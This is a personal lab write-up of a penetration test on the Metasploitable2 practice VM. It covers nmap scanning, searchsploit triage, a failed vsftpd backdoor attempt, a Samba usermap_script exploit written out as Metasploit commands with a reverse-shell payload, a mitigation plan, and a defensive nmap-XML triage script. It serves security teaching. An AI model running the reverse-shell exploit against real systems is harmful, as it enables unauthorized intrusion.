Dive into a real-world penetration testing scenario where I put theoretical knowledge into practice. This project, using Kali Linux against Metasploitable2, focused on mastering reconnaissance, exploitation, and crafting robust remediation plans. Here’s a detailed walkthrough of my journey and the invaluable lessons I gained.

Environment
Our simulated battleground comprised a Kali Linux virtual machine as the attack platform, targeting a vulnerable Metasploitable2 virtual machine.

1) Reconnaissance & Scanning
The initial phase kicked off with comprehensive network reconnaissance using nmap. I deployed a versatile nmap command (sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x) to identify open ports, active services, and their respective versions. Key findings included an unresponsive vsftpd 2.3.4 service on port 21/tcp and Samba smbd 3.x operating on port 445/tcp.

2) Enumeration & Triage
With an inventory of active services, the next step was enumeration and vulnerability identification. I leveraged searchsploit, a powerful tool for finding exploits in the Exploit-DB archive, cross-referencing our nmap XML output and specific service versions (searchsploit --nmap scans/target.xml, searchsploit vsftpd 2.3.4, searchsploit samba 3.0.20). This process highlighted two promising vulnerabilities: the vsftpd 2.3.4 backdoor (CVE-2011-2523) and the Samba username-map script exploit (CVE-2007-2447).

3) Exploitation
Moving to the exploitation phase, I first targeted the vsftpd backdoor (CVE-2011-2523) using Metasploit’s exploit/unix/ftp/vsftpd_234_backdoor module. Despite nmap indicating the vulnerable version, manual checks revealed the service was unresponsive, leading to an unsuccessful exploit attempt.

Undeterred, I turned my attention to the Samba username-map script vulnerability (CVE-2007-2447). Launching msfconsole, I configured the exploit/multi/samba/usermap_script module, setting the RHOSTS and RPORT to the target’s IP and Samba’s port (445), respectively. I selected a cmd/unix/reverse payload, configured LHOST to my Kali IP and LPORT to 4444, and initiated the exploit. This attempt was successful, granting me a crucial remote shell on the Metasploitable2 target.

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set RPORT 445
set payload cmd/unix/reverse
set LHOST <kali-ip>
set LPORT 4444
exploit

4) Post-Exploitation
Upon gaining a remote shell, post-exploitation began. I immediately verified my privileges using id and gathered system information with uname -a. Every step, including successful commands and their outputs, was meticulously documented with screenshots to serve as evidence for the remediation phase.

id
uname -a

5) Mitigation Summary
The final, and arguably most critical, phase involved developing a robust mitigation plan based on the identified vulnerabilities and successful exploit. My recommendations included:

  • Proactive Security: Implementing continuous vulnerability scanning and maintaining an up-to-date asset inventory.
  • Patch Management: Promptly updating Samba and all other services to their latest secure versions.
  • Network Segmentation & Filtering: Restricting and blocking access to critical ports like 445 and 21 through firewall rules, coupled with effective network segmentation.
  • Service Hardening: Disabling all unused services and removing guest/anonymous access where unnecessary.
  • Least Privilege: Enforcing the principle of least privilege for all shares and user accounts.
  • Monitoring & Response: Establishing comprehensive logging and monitoring, alongside developing a strong incident response plan.
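To make the "continuous vulnerability scanning" and "asset inventory" recommendations concrete, here is an added example (not a script from the post's repository) that reads the nmap XML produced by the -oA scan above and flags the two product/version pairs triaged with searchsploit, plus any open port the mitigation plan says should be firewalled. The nmap XML below is a constructed sample that mirrors the walkthrough's findings; the host address in it is made up.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX sample mirroring the walkthrough's findings (not the
# post's real scan output; the address is made up).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap"><host>
  <address addr="192.168.56.101" addrtype="ipv4"/>
  <ports>
    <port protocol="tcp" portid="21"><state state="open"/>
      <service name="ftp" product="vsftpd" version="2.3.4"/></port>
    <port protocol="tcp" portid="445"><state state="open"/>
      <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
    <port protocol="tcp" portid="22"><state state="open"/>
      <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
  </ports>
</host></nmaprun>"""

# Exact product/version pairs the post triaged with searchsploit.
KNOWN_BAD = {
    ("vsftpd", "2.3.4"): "CVE-2011-2523 (vsftpd 2.3.4 backdoor)",
    ("Samba smbd", "3.0.20"): "CVE-2007-2447 (Samba username-map script)",
}
# Ports the mitigation plan says to block or restrict at the firewall.
RESTRICTED_PORTS = {21, 445}

def triage(xml_text):
    """Return (ip, port, product, version, note) for every open port."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        ip = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            portid = int(port.get("portid"))
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            notes = []
            if (product, version) in KNOWN_BAD:
                notes.append(KNOWN_BAD[(product, version)])
            elif product == "Samba smbd" and version.startswith("3."):
                # nmap often reports only a range; confirm the exact build by hand.
                notes.append("Samba 3.x: verify exact version against CVE-2007-2447")
            if portid in RESTRICTED_PORTS:
                notes.append("restricted port reachable: firewall or segment")
            findings.append((ip, portid, product, version, "; ".join(notes)))
    return findings
```

Run it against scans/target.xml on a schedule and diff the output against the previous run to catch new exposures, which is what the asset-inventory recommendation amounts to in practice.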

Conclusion
This practical exercise culminated in successfully obtaining a remote shell on Metasploitable2 through the Samba exploit. The entire workflow, from initial scanning to post-exploitation and detailed mitigation planning, profoundly emphasized the importance of not just identifying vulnerabilities but also understanding the critical role of timely remediation and robust detection mechanisms in a comprehensive security strategy. For those interested in deeper insights, I’m happy to share the full repository containing scripts and example outputs.
